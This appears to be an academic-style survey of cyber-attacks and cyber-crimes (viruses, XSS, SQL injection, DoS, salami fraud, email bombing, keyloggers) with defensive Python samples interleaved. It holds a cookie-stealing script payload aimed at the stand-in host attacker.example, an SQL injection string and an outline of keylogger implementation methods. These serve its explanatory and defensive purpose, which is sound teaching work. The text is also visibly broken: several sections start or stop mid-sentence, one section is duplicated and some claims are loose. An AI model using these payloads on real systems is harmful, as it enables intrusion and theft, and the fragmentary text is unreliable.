Data processing on computers plays an important role in business sectors, government agencies, private and corporate sectors and many other organizations. Transactions, banking, corporate records, government activities and many other areas depend on computers, information security and the Internet. A computer's susceptibility to external attack complicates the auditor's task of verifying accounts, especially since the computer can be operated remotely through different forms of Internet communication. The losses from computer crime cannot be established without a clear understanding of what such crime entails and an accurate record of its occurrence. Governments and corporations should define a process to follow in the event of any unacceptable computer-related illegal activity, which in turn may affect the degree to which computer abuse is reported.

As with the automobile, the criminal use of computer technology has increased the vulnerability of the community, and to the extent that the definition of crimes and the enactment of prohibitions are directed to the protection of the community, computer technology is a legitimate area of penal concern. Laws must not only enable the redress of wrongs or the punishment of the wrongdoer, they must also proscribe conduct; the complexity of the means for misconduct afforded by computer technology merits its special treatment.

When the computer is used as an instrument of crime, for example as a metaphorical weapon against a financial institution, familiar landmarks identify the conduct as criminal. But when the computer is the object of crime, the crime is not limited to theft of the computer itself; it extends to things of substantial value that are intangible and whose legal status is unclear. For example, the information stored in a computer can be retrieved and misused without damage to the computer and without the owner's knowledge. So great is the capacity of a computer, and so valuable are its services, that even short periods of unauthorized use can be worth a great deal. The degree to which these intangibles can or should be protected is a significant issue for the law, and it is exactly this issue that arises when computer crimes take place.


sensitive information from our computers that are connected to the Internet. The following explains the basic definition of cyber terrorism, the types of malicious cyber-attacks, and the cyber-crimes that affect the implementation of big data solutions and big data analytics as a whole.

The following section surveys the major known cyber-attacks and cyber-crimes. Some of these attacks and crimes may not apply to big data analytics, directly or indirectly, but together they provide a useful survey of the field.

A. Cyber Terrorism

Cyber terrorism is the intentional use of computers and networks by terrorists to cause large-scale disruption of computer networks over the Internet, using tools such as computer viruses, in order to cause destruction and harm in pursuit of their objectives. Many minor incidents of cyber terrorism have been identified and documented. Another way of looking at it: terrorism creates terror in people's minds, and when similar terror is created over the Internet, it is known as cyber terrorism. Some publications use other names, such as cybercrime, cyberwar and terrorism. Cyber terrorism thus deals with the use of electronic means to attack computers and information over the Internet.

B. Cyber Malicious Attacks

Cyber-attacks have been defined as a means of rendering a system useless or of gaining criminal or political advantage. There are many types of cyber-attacks, but the literature recognizes the following as the main ones. For details, please refer to [16-21].

i) Virus

One way of transmitting malicious code into a computer is a virus. A virus is self-replicating code embedded within another program, known as the host. It is a small program designed to spread from one computer to another, interfere with computer operation and leave infections. It can disrupt the operation of hardware, software and files stored in computers. In general, a virus is attached to an executable program and does not affect a computer until that program is run, opened or executed; viruses are spread by people, for example by sending them in e-mails or as e-mail attachments.

Let's see how a virus works. When a user executes a host program that has been infected, the embedded virus code executes first. It searches the computer's file system for another executable program and, once it finds one, infects (or, in some viruses, overwrites) that program with its own code. Only then does the virus allow the original host program to execute. Viruses are commonly spread via e-mail attachments. A virus occupies disk space, consumes CPU power and can damage the computer's file system and any personal information stored on it. A large number of commercial antivirus packages are available that can detect and remove viruses before they cause any damage. We have to be careful when installing antivirus software, however, as our computers may be infected by fake antivirus applications that route our packets, for any application we use, through their own intermediate server.
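The simplest detection technique used by antivirus packages is signature matching: compare a fingerprint of each file against a database of fingerprints of known malware. The sketch below is a minimal illustration under stated assumptions: `KNOWN_BAD_SHA256` is a hypothetical signature set (here it holds only the hash of a harmless test string), and whole-file SHA-256 hashes stand in for the richer byte-pattern and behavioural signatures that real products use.

```python
import hashlib
import tempfile
from pathlib import Path

# Hypothetical signature database: SHA-256 digests of known-malicious files.
# For illustration it holds only the digest of a harmless test string.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"harmless-test-sample").hexdigest(),
}


def sha256_of_file(path: Path, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so that large files need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_directory(root: Path) -> list[Path]:
    """Return every regular file under root whose digest matches a known signature."""
    return [p for p in sorted(root.rglob("*"))
            if p.is_file() and sha256_of_file(p) in KNOWN_BAD_SHA256]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "report.txt").write_bytes(b"ordinary document")
        (root / "sample.bin").write_bytes(b"harmless-test-sample")
        print([p.name for p in scan_directory(root)])  # ['sample.bin']
```

Exact-hash signatures miss any virus that changes a single byte of itself, which is why commercial scanners combine them with heuristic and behaviour-based detection.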

ii) Worm

A worm is a self-contained program that looks for security weak points, or holes, and uses them as entry points to spread into computers. It is a small program similar to a virus and is considered a subclass of viruses. Unlike a virus, however, a worm spreads from computer to computer without human help, travelling via file or information transport mechanisms. One of its most notable features is that it replicates itself after execution, so it can send a large number of copies of itself from one computer to others.

A worm can send a copy of itself to any e-mail address; after travelling to another computer, it replicates itself into a number of copies on that computer, and so on. It consumes significant memory and network bandwidth and affects the working of web servers in one way or another. Dealing with a worm can be time-consuming and tedious, as the IT department has to defend computers from further attacks, investigate the computers that have been affected, install patches, clean the computers and reconnect them to the Internet.
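Why self-replication makes worms spread so fast can be seen with a simple discrete-time susceptible-infected (SI) epidemic model, a standard simplification that is not taken from this paper. In the sketch below, the number of vulnerable hosts `n`, the contact rate `beta` and the starting count are hypothetical parameters; each step, every infected host infects a share of the still-vulnerable population.

```python
def simulate_worm_spread(n: int, initially_infected: int, beta: float, steps: int) -> list[float]:
    """Discrete-time SI model: new infections per step = beta * I * (N - I) / N.

    n: number of vulnerable hosts (hypothetical)
    beta: average successful infection attempts per infected host per step (hypothetical)
    Returns the number of infected hosts after each step (index 0 is the start).
    """
    infected = float(initially_infected)
    history = [infected]
    for _ in range(steps):
        new_infections = beta * infected * (n - infected) / n
        # Clamp: a large beta can otherwise overshoot the population size.
        infected = min(float(n), infected + new_infections)
        history.append(infected)
    return history


if __name__ == "__main__":
    curve = simulate_worm_spread(n=100_000, initially_infected=1, beta=1.5, steps=40)
    for step in (0, 10, 20, 30, 40):
        print(step, round(curve[step]))
```

Early on, the infected count grows roughly by a factor of (1 + beta) per step; it then levels off as vulnerable hosts run out, giving the S-shaped curve typical of fast-spreading worms and explaining why patching must happen before the steep middle phase.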

One such worm, launched in April 2004, uses the same method of locating security weak points or holes to enter computers. Its effect is rather minimal compared to other worms, in the sense that infected computers shut down after booting.

iii) Instant messaging worm

This type of worm targets instant messaging systems, and as such it did not have much effect in 2001, when it was launched. Now, with over 800 million people using instant messaging, its effect has become greater, as infected computers may be unable to use Microsoft's instant messaging services until appropriate patches are installed.

iv) Conficker

This worm was launched in November 2008 against Windows computers and is notable for being able to propagate between computers in several different ways. Different variants of it have been introduced since November 2008. The latest version looks for computers with weak password protection and can propagate through USB flash memory devices and shared files on local area networks. Current security measures are strong enough to keep the effect of this worm to a minimum.

v) Cross-site Scripting

In this type of attack, a malicious client-side script is injected into a web site. When a user accesses that web site, the user's browser executes the script, which may record any cookies and the user's activities, or perform any other actions defined in the script.
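The usual defence is to escape user-supplied text before inserting it into a page, so that the browser displays it instead of executing it. The sketch below uses Python's standard `html.escape`; the two `render_comment` helpers and the attacker URL are hypothetical, and real applications normally rely on a templating engine that escapes automatically, plus a Content Security Policy.

```python
import html


def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user input is pasted into the page unchanged.
    return f"<p class='comment'>{comment}</p>"


def render_comment(comment: str) -> str:
    # Safer: &, <, > and both quote characters become HTML entities,
    # so the browser shows the text instead of running it.
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


payload = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
print(render_comment_unsafe(payload))  # the <script> element would execute
print(render_comment(payload))         # starts with <p class='comment'>&lt;script&gt;
```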


vi) Drive-by Download

Many genuine, legitimate web sites have been infected by software that causes unwanted software to be downloaded to visitors' computers; this is known as a drive-by download. In some cases, the user may see another window pop up while working on a web site, asking for permission to download the software, and may consider it part of the web site he or she is visiting. According to the Google Anti-Malware Team, there are more than 300 million URLs that initiate drive-by downloads.

vii) Trojan Horse

A Trojan horse is a small program that may steal passwords to online games, change icons on the desktop, delete files or destroy information stored on the computer. Sometimes it also performs actions unknown to the user. It may also create a backdoor on our system, through which intruders can access all of our information, including confidential information. Unlike viruses and worms, a Trojan horse neither reproduces by infecting other files nor self-replicates.

viii) Backdoor Trojan

This program allows the attacker to gain access to the user's computer. It gives the impression that it is cleaning malware from the computer, but it is actually installing spyware.

ix) Spam

One of the most powerful applications of the Internet has been e-mail: it is estimated that over one billion e-mail accounts are active around the globe and that over 300 billion e-mail messages are sent over the Internet per day. Spam displaces legitimate e-mail messages and creates a suspicious environment in which users have to guess which messages are genuine. About 90% of spam is sent via botnets, which bot herders build across different types of networks using programs specifically designed to search for Internet-connected computers with poor security. A number of surveys show that the volume of spam is increasing at an alarming rate; in 2009, over 90% of the e-mail on the Internet was found to be spam.

Spam wastes significant processing power, Internet bandwidth and mail-server storage, and the resulting loss of productivity amounts to billions of dollars. A number of spam filters have been introduced for Internet Service Providers (ISPs) that block spam from reaching users' mailboxes.
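To make the idea of a spam filter concrete, the sketch below scores a message by summing the weights of suspicious phrases it contains and flags it above a threshold. The phrase list, weights and `THRESHOLD` are hypothetical; production ISP filters learn their weights statistically and also use sender reputation and authentication checks.

```python
import re

# Hypothetical phrase weights; real filters learn weights from labelled mail.
SPAM_PHRASES = {
    "winner": 2.0,
    "free money": 3.0,
    "click here": 1.5,
    "urgent": 1.0,
    "wire transfer": 2.5,
}
THRESHOLD = 3.0  # hypothetical cut-off score


def spam_score(text: str) -> float:
    """Sum the weight of every occurrence of each listed phrase (case-insensitive)."""
    lowered = text.lower()
    return sum(weight * len(re.findall(re.escape(phrase), lowered))
               for phrase, weight in SPAM_PHRASES.items())


def is_spam(text: str) -> bool:
    return spam_score(text) >= THRESHOLD


print(is_spam("URGENT: you are a WINNER, click here"))   # True (score 4.5)
print(is_spam("Minutes of Tuesday's project meeting"))  # False (score 0)
```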

x) Phishing and spear phishing

This attack is intended to gain access to computers and retrieve personal information and other sensitive files. The attacker typically uses a botnet to send e-mails to a large number of users. The sender address of such mail looks genuine, and the message asks recipients to provide information such as their login name, password and other personal details, which is then used for identity theft. The number of phishing attacks is increasing every year.

Spear phishing is a targeted form of phishing in which the attacker selects a particular group of recipients from whom to steal personal information, for example elderly or retired people.
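Phishing e-mails often show a genuine-looking address as the link text while the link itself points to the attacker's server. The sketch below, built on Python's standard `html.parser` and `urllib.parse`, flags such links by comparing the host named in the visible text with the host of the actual `href`. It is a hypothetical heuristic for illustration, not a complete phishing detector: it ignores links whose text is not a host name, and all the example domains are made up.

```python
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def deceptive_links(html_body: str) -> list[tuple[str, str]]:
    """Flag links whose visible text names a host different from the real target."""
    parser = LinkCollector()
    parser.feed(html_body)
    flagged = []
    for text, href in parser.links:
        if not text or " " in text:
            continue  # visible text is not a URL or host name, e.g. "click here"
        shown = urlparse(text if "://" in text else "http://" + text).hostname
        actual = urlparse(href).hostname
        if shown and actual and "." in shown and shown != actual:
            flagged.append((text, href))
    return flagged
```

For example, `<a href="http://bank.example.attacker.example/login">www.bank.example</a>` is flagged, because the visible host `www.bank.example` differs from the real host `bank.example.attacker.example`.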

xi) SQL Injection

SQL injection targets web applications that are driven and maintained by databases. The attacker types SQL fragments into a text input of the application; if the application builds its SQL query by inserting that text directly into the query string, the database executes the attacker's SQL and may return personal information in response.
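The difference between a vulnerable and a safe query can be shown with Python's built-in `sqlite3` module and an in-memory database. The table, its contents and the two lookup functions are hypothetical; the point is that string formatting lets the input rewrite the `WHERE` clause, whereas a `?` placeholder makes the driver treat the input purely as a value.

```python
import sqlite3

# In-memory demo database with hypothetical data.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "alice@example.org"), ("bob", "bob@example.org")])


def lookup_unsafe(name: str):
    # Vulnerable: the input is spliced into the SQL text.
    query = f"SELECT name, email FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_safe(name: str):
    # Parameterized: the driver binds the input as a value, never as SQL.
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


attack = "x' OR '1'='1"
print(len(lookup_unsafe(attack)))  # 2: the WHERE clause became always true
print(lookup_safe(attack))         # []: no user is literally named "x' OR '1'='1"
```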

xii) Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS)

This type of cyber-attack is often politically motivated and aims to undermine features of Internet communication such as integrity, confidentiality, availability and security measures, as well as critical vulnerable infrastructure. These attacks are often initiated by government agencies, terrorist organizations and other politically motivated groups seeking to damage an opponent's infrastructure and confidential policy documents.

Denial-of-service (DoS) attacks involve flooding a computer with more requests than it can handle. This causes the computer (e.g. a web server) to crash or become unresponsive, so that authorized users are unable to access the service it offers. Attackers usually target the web servers of banks, credit card payment gateways, root name servers, businesses, corporations and many others.

A denial-of-service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.

A DoS attack may include the execution of malware with effects such as the following on the services offered by hosts over the Internet: using all the processing capacity of the processors so that no other work can be done, triggering errors in the microcode of the machine, triggering errors in the sequencing of instructions that force the computer to behave abnormally, exploiting errors in the operating system, and crashing the operating system.

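There are several specific forms of these attacks, such as the TCP/IP SYN attack, the Ping of Death and flooding a server with URL requests. TCP/IP uses a three-way handshake to establish a connection between client and server: the client sends a request (SYN), the server acknowledges it (SYN-ACK) and waits, and the client then acknowledges (ACK) before data are transmitted. In a SYN attack, the attacker sends many SYN requests, often from spoofed addresses, but never sends the final ACK, so the server keeps waiting on half-open connections until its connection queue is full and legitimate clients are refused. In the Ping of Death, the attacker sends a malformed ping (ICMP echo) packet that, once its fragments are reassembled, exceeds the 65,535-byte maximum IP packet size and crashes or freezes vulnerable systems; in a related ping flood, many clients send ping requests to a server and generate significant traffic. When a server is flooded with URL requests, one client or many clients make requests at the same time; when many clients do so together, the result is a distributed denial-of-service (DDoS) attack, often directed at the financial sector.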
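The effect of a SYN attack on a server's connection queue can be illustrated with a toy simulation (not a network program). Under the hypothetical assumptions in the sketch, the server has `backlog_size` slots for half-open connections, each spoofed SYN holds a slot for `timeout` ticks because its handshake never completes, and one legitimate client tries to connect each tick; the function reports the fraction of legitimate attempts that find the queue full.

```python
from collections import deque


def simulate_syn_flood(backlog_size: int, timeout: int,
                       attack_syns_per_tick: int, ticks: int) -> float:
    """Return the fraction of legitimate connection attempts that are refused.

    Each tick: expire stale half-open entries, add the attacker's spoofed SYNs
    (which never complete), then one legitimate client sends a SYN. If a slot
    is free, its handshake completes at once and the slot is released.
    """
    half_open: deque = deque()  # expiry tick of each spoofed half-open entry
    refused = 0
    for now in range(ticks):
        while half_open and half_open[0] <= now:
            half_open.popleft()  # half-open entry times out
        for _ in range(attack_syns_per_tick):
            if len(half_open) < backlog_size:
                half_open.append(now + timeout)
        if len(half_open) >= backlog_size:
            refused += 1  # no slot left for the legitimate SYN
    return refused / ticks


print(simulate_syn_flood(backlog_size=128, timeout=75, attack_syns_per_tick=10, ticks=200))  # 0.94
print(simulate_syn_flood(backlog_size=128, timeout=75, attack_syns_per_tick=1, ticks=200))   # 0.0
```

The attack succeeds once the attack rate multiplied by the timeout exceeds the backlog size, which is why real servers enlarge the backlog, shorten the timeout, or avoid per-connection state altogether with SYN cookies (see RFC 4987).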

C. Cyber-crimes


and to seek to place them in an appropriate context in which their impact can be judged.

The following subsections describe the cyber-crimes that affect data analysis, virtualization and other data mining techniques as applied to big data applications.

i) Malware

A significant security weakness of unencrypted Wi-Fi networks was exposed through an extension to the popular Firefox browser. Computers themselves also have security weaknesses: malicious software, known as malware, can penetrate their security measures, consume significant CPU time, occupy a large amount of disk space and destroy valuable data in file systems. Once attackers have access to our computers via malware, the computers can be used to store stolen credit card information or as a launch pad for sending spam and for denial-of-service attacks on other servers.

ii) Salami technique

This automated crime steals small amounts of assets from a large number of sources without noticeably reducing the whole. It works by making small alterations in the records of financial institutions, banks or other organizations. The crime is committed via a series of many small actions that add up to a large one, which makes it difficult to detect; a single large action of the same size would readily be recognized as unlawful. In the financial sector, for example, the criminal may take fractions of a penny produced by rounding off figures and accumulate a large amount over a period of time. Because the small actions can be automated, the same kind of automatic collection of small amounts can also be performed in other sectors, such as publishing, the film industry and television.

The name comes from "salami tactics", a divide-and-conquer process of threats and alliances used in a variety of settings such as business, organizations and politics. Take the example of a bank whose interest processing is altered so that the interest calculated for every account is rounded down to the nearest cent; an automated program collects the rounded-off fractions and funnels them to the intruder's account. Such a program may well go undetected, because the amount taken from each account is too small to be noticed.
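The arithmetic of the rounding scheme can be worked through with Python's `decimal` module, which avoids binary floating-point error. The sketch assumes hypothetical balances and a hypothetical monthly rate, and assumes that each account is credited its interest truncated to the cent while the sub-cent remainder is what a salami program would divert. Comparing the exact total with the credited total is also exactly the reconciliation an auditor would perform.

```python
from decimal import ROUND_DOWN, Decimal

CENT = Decimal("0.01")


def salami_remainders(balances: list[Decimal], monthly_rate: Decimal) -> tuple[Decimal, Decimal]:
    """Return (total credited to customers, total sub-cent remainder skimmed)."""
    credited = Decimal("0")
    skimmed = Decimal("0")
    for balance in balances:
        exact = balance * monthly_rate                     # exact interest
        truncated = exact.quantize(CENT, rounding=ROUND_DOWN)
        credited += truncated
        skimmed += exact - truncated                       # always in [0, 0.01)
    return credited, skimmed


balances = [Decimal("1234.56"), Decimal("987.65"), Decimal("100.00")]
credited, skimmed = salami_remainders(balances, Decimal("0.004"))
print(credited, skimmed)  # 9.28 0.00884
```

Less than one cent disappears from these three accounts, but with one million accounts and an average remainder of half a cent, the scheme would collect about $5,000 every month.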

iii) Scavenging

Scavenging is obtaining information that has been left in or around a computer system after it has been used for a job. On time-sharing computers, data are stored on and retrieved from shared storage devices such as tapes; a scavenger can write a small amount of data and then read the entire tape, recovering residual data left by the previous job. Code numbers, passwords and encryption devices may be used to prevent such unauthorized use.

iv) Denial-of-service

We have discussed denial-of-service above as an attack, but in some books and publications it is also considered a cyber-crime. It is any attempt to make machine or network resources unavailable to their intended users, and it usually consists of interrupting or suspending, temporarily or indefinitely, the services of hosts connected to the Internet. Its forms include: consumption of computational resources such as bandwidth, memory, disk space or processor time; disruption of configuration information, such as routing information; disruption of state information, such as unsolicited resetting of Transmission Control Protocol (TCP) sessions; disruption of physical network components; and obstruction of the communication media between the intended users and the victim so that they can no longer communicate adequately.

In general, this crime is carried out either by forcing the targeted computer(s) to reset or by consuming their resources so that they can no longer provide their intended service. It violates the proper-use policy of the Internet Architecture Board (IAB) as well as the acceptable use policies of Internet Service Providers, and it also violates the laws of some countries.

v) Financial crime

These crimes include cyber cheating, credit card fraud, money laundering, hacking into financial institutions and banks, accounting scams, computer manipulation, etc.

vi) On-line gambling

A large number of web sites offer online gambling. Some countries have legalized these web sites; in those countries online gambling is considered legal and safe, and the site owners are licensed to operate.

vii) Intellectual property Crimes

These crimes include software piracy, copyright infringement, trademark violation, theft of programs and source code, and other intellectual property violations (music, poems, inventions, etc.).

viii) Forgery

Forgery is the creation of counterfeit currency notes, academic certificates, mark sheets and revenue stamps using computers, printers, scanners and associated software.

ix) Sale of illegal articles

This crime is the sale of illegal items such as drugs and narcotics, weapons, pornographic material and wildlife, or of information about the availability of such items, over the Internet via postings on auction web sites, bulletin boards and similar web sites.

x) Cyber pornography


or any other web sites over Internet through any computing devices.

xi) Email bombing

This crime involves sending a large number of e-mails to a selected target or server (e.g. a company's e-mail server or an Internet service provider) in order to crash it.

xii) Email spoofing

In e-mail spoofing, a message appears to originate from a known source but has actually been sent from another source. In other words, the attacker forges the sender information in the message header, such as the From address, which the basic e-mail transfer protocol (SMTP) does not verify, and uses it to send his or her own message.
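Because SMTP does not authenticate the From header by itself, receiving servers rely on standards such as SPF, DKIM and DMARC. A much cruder heuristic, shown below as a hypothetical sketch using Python's standard `email` package, flags a message whose visible From domain differs from its Return-Path (envelope sender) domain. It produces false positives for legitimate mailing lists and bulk senders and is no substitute for those standards; all domains in the example are made up.

```python
from email import message_from_string
from email.utils import parseaddr


def _domain(address: str) -> str:
    return address.rpartition("@")[2].lower()


def sender_domains_mismatch(raw_message: str) -> bool:
    """True if the From domain differs from the Return-Path domain."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    _, return_path = parseaddr(msg.get("Return-Path", ""))
    if not from_addr or not return_path:
        return False  # not enough information to judge
    return _domain(from_addr) != _domain(return_path)


spoofed = (
    "Return-Path: <bounce@mailer.attacker.example>\n"
    "From: Your Bank <security@bank.example>\n"
    "Subject: Verify your account\n"
    "\n"
    "Please log in.\n"
)
print(sender_domains_mismatch(spoofed))  # True
```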

xiii) Cyber defamation

Cyber defamation is defamation or slander via digital media, namely computers and the Internet, that harms the reputation of an individual, business, product, service, organization, government, religion, culture, nation, invention or family, including criticism made without any evidence. It is not a distinct offense, misdemeanor or tort in itself, but defamation committed through a particular medium. Different countries have different laws and punishments for it, but the underlying rights are set out in the UN Universal Declaration of Human Rights and in the fundamental human rights of the European Union.

xiv) Cyber Stalking

Cyberstalking can be defined as a technologically based "attack" on a person who has been targeted specifically for reasons of anger, revenge or control. It uses the Internet, e-mail and other digital media and devices for harassment, embarrassment and humiliation of the victim, ruining the victim's credit score, harassing family, friends and employers to isolate the victim, scare tactics to instill fear, identity theft, threats, vandalism, solicitation for sex, collecting information that may be used for harassment or threats, false accusations and similar acts. Stalking may be offline or online, and both are criminal offenses. Cyberstalking may be considered a form of cyberbullying, and the two terms are often used interchangeably because both involve more or less the same set of activities.

Stalking is a continuous process consisting of a series of actions, each of which may be entirely legal in itself. It can be considered a form of mental assault and harassment in which the attacker repeatedly, unwantedly and disruptively intrudes on a victim with whom he or she has no relationship, including by breaking into the victim's machine, for motives that are directly or indirectly traceable to the affective (emotional) realm. Cyberstalking differs from cyber trolling: the former is persistent and harmful, while the latter is mainly perceived as harmless. Note also that close online scrutiny of a public figure such as a politician, business leader or actor may be considered lawful.

xv) Web defacement

This crime is an attack on a website with a view to changing the visual appearance of the site or of a web page. The attackers break into the web server and replace the site's pages with pages of their own design. Religious, government and corporate sites have been seen to be the primary targets of attackers seeking to promote their religious and political views and beliefs. After defacement, these sites may be forced to shut down for repairs, which causes loss of profit and value as well as additional recovery expenses.

xvi) Email bombing

This crime involves sending a large number of e-mails to a victim's e-mail address or to the mail servers of organizations, universities, government agencies or even Internet service providers. The main purpose is to overflow the mailbox or overwhelm the mail servers, causing a denial of service to the mailboxes or mail servers. It can be accomplished by three methods: mass mailing, list linking and zip bombing. In mass mailing, duplicate messages are sent to the same e-mail address; such attacks are easy to design and implement. Mass mailing can also be carried out by a botnet: malware is used to take over a cluster of computers (zombies), which are programmed to send e-mails to the target addresses continuously. This form of e-mail bombing is similar in purpose to other distributed DoS flooding attacks. Because the targets are frequently the dedicated hosts that handle a business's website and e-mail accounts, the attack can be just as devastating to both services on the host. It is more difficult to defend against than a simple mass-mailing bomb because of the multiple source addresses and the possibility that each zombie computer sends a different message or employs stealth techniques to defeat spam filters. Fortunately, some of these attacks can be controlled by filters and firewalls.

In list linking, the victim's e-mail address is signed up to a large number of e-mail list subscriptions, and the victim then has to unsubscribe from these unwanted services manually. To prevent this type of bombing, most e-mail subscription services send a confirmation e-mail to the address being registered, and the subscription takes effect only after it is confirmed. This prevention can be circumvented, however, if the attacker subscribes a newly created e-mail account that he or she controls and can confirm, and sets it to forward all mail automatically to the victim.
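The confirmation ("double opt-in") step can be sketched as follows, assuming a hypothetical per-service secret key and in-memory sets in place of a database. A request only creates a pending entry; the HMAC-derived token is e-mailed to the address, and the subscription becomes active only when that token is presented. An attacker who signs up a victim's address never sees the token, so the subscription stays pending.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # hypothetical per-service secret
pending: set[tuple[str, str]] = set()
active: set[tuple[str, str]] = set()


def confirmation_token(email: str, list_name: str) -> str:
    message = f"{email.lower()}|{list_name}".encode()
    return hmac.new(SERVER_KEY, message, hashlib.sha256).hexdigest()


def request_subscription(email: str, list_name: str) -> str:
    """Record a pending request; the returned token would be e-mailed to the address."""
    pending.add((email.lower(), list_name))
    return confirmation_token(email, list_name)


def confirm(email: str, list_name: str, token: str) -> bool:
    """Activate the subscription only if the correct token is presented."""
    key = (email.lower(), list_name)
    if key in pending and hmac.compare_digest(token, confirmation_token(email, list_name)):
        pending.discard(key)
        active.add(key)
        return True
    return False
```

`hmac.compare_digest` is used instead of `==` so that the comparison time does not reveal how many leading characters of a guessed token are correct.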

Zip bombing is a variant of mail bombing that exploits mail servers which check incoming mail with anti-virus software, looking for malicious file types such as EXE, RAR, Zip and 7-Zip and unpacking compressed archives to inspect their contents. A zip bomb is a small compressed archive, for example of a huge text file consisting of a single repeated character, that expands enormously when unpacked; decompressing it consumes a significant amount of processing, which may cause a denial of service.
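A defensive sketch: before extracting an attachment, a mail filter can read the uncompressed sizes recorded in the archive's central directory with Python's standard `zipfile` module and reject archives that would expand too much. The limits `MAX_RATIO` and `MAX_TOTAL_BYTES` are hypothetical. Because the recorded sizes can be forged, a robust filter should also cap the number of bytes actually produced while decompressing.

```python
import io
import zipfile

MAX_RATIO = 100                     # hypothetical: reject more than 100x expansion
MAX_TOTAL_BYTES = 50 * 1024 * 1024  # hypothetical: 50 MiB uncompressed limit


def looks_like_zip_bomb(data: bytes) -> bool:
    """Check declared sizes in the archive directory without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        total_uncompressed = sum(i.file_size for i in infos)
        total_compressed = sum(i.compress_size for i in infos) or 1
    return (total_uncompressed > MAX_TOTAL_BYTES
            or total_uncompressed / total_compressed > MAX_RATIO)


def make_zip(name: str, payload: bytes) -> bytes:
    """Build a deflate-compressed archive in memory (demo helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    print(looks_like_zip_bomb(make_zip("z.txt", b"z" * 10_000_000)))  # True
    print(looks_like_zip_bomb(make_zip("note.txt", b"a short note")))  # False
```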

xvii) Spyware and Adware


hand, pops up commercial advertisements related to our work and many other activities.

xviii) Rootkits

A rootkit is a set of programs that provides privileged access to our computers and may start executing before the operating system has completed the booting process. In doing so, it uses its privileges to hide itself and to subvert the underlying security measures.

xix) Bots and Botnets

A bot program acts like a backdoor Trojan that responds to remote command-and-control programs. Bots have affected two popular applications, Internet Relay Chat (IRC) and multiplayer Internet games, and are now being used to support illegal activities in other applications as well. The computers infected by bots form a network known as a botnet. Botnets are becoming bigger and bigger, and many users are not sure whether their computers are part of one.

xx) Blended threat

A blended threat uses server and Internet vulnerabilities to initiate, transmit and spread an attack onto computers. It is more sophisticated than viruses, worms, Trojan horses and other malicious code, because it harms the infected system and networks by propagating through different methods and entry points and by exploiting multiple vulnerabilities.

This type of attack is designed to use multiple modes of transport: whereas a worm may travel and spread through e-mail alone, a single blended threat could use multiple routes, including e-mail, IRC and file-sharing networks. In addition to specific attacks on predetermined .exe files, it could perform multiple malicious acts at the same time, such as modifying EXE files, HTML files and registry keys, and so cause damage in several areas of a network at once. Blended threats are considered the worst security risk since the inception of viruses, as most of them require no human intervention to propagate.

xxi) Keylogger

A keylogger is a program that covertly records each keystroke on the keyboard (keystroke logging) without the user being aware that it is on his or her machine. Such programs also have legitimate uses, for example in the study of human-computer interaction. Keyloggers use different keylogging methods based on hardware and software. Some IT organizations use keyloggers to troubleshoot technical problems with computers and business networks, and families or businesses may legally use them to monitor network usage without their users' direct knowledge. However, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.

The keylogger program can be implemented in different ways, some of which are discussed below:

V. VARIOUS IMPLEMENTATION APPROACHES OF KEYLOGGERS

i) In the first approach, the keylogger resides in a malware hypervisor running underneath the operating system, which remains untouched but effectively becomes a virtual machine.

ii) In another approach, the program obtains root access, hides itself in the operating system and intercepts the keystrokes that pass through the kernel. Kernel-level keyloggers are difficult to detect, especially for user-mode applications that do not have root access. They are usually implemented as rootkits that subvert the operating system kernel to gain unauthorized access to the hardware, which makes them very powerful, and they often act as keyboard device drivers to gain access to the keyboard.

iii) In another approach, the program hooks keyboard APIs inside a running application. It registers for keystroke events, receives an event each time a key is pressed or released, and records it. Windows APIs such as GetAsyncKeyState() are used to poll the state of the keyboard, GetForegroundWindow() to identify the active window, and other APIs to subscribe to keyboard events.

iv) Another approach is based on logging web form submissions by recording form-submission events in the web browser. This happens when the user completes a form and submits it, for example by pressing the Enter key, so the data are recorded before they are passed over the Internet.

v) Another approach is based on memory injection: the keylogger alters the memory tables associated with the browser and other system functions to perform its logging. By patching memory in this way, malware authors can bypass Windows User Account Control (UAC).

vi) Another approach captures the network traffic associated with HTTP POST events in order to retrieve unencrypted passwords.

vii) Another approach is based on remote-access software with an added feature that allows the locally recorded data to be accessed from a remote location. Remote communication may be achieved via an FTP server, e-mail, wireless communication, remote login, etc.


for second language learning, programming skills, typing skills and many other learning-based programs.

xxii) Internet time theft

This refers to the use, by an unauthorized person, of Internet hours paid for by another person. A related form, common and difficult to detect, is office time theft by employees who use technology for non-work-related purposes. This could range from browsing the Internet to spending time on social networking sites and texting during work hours.

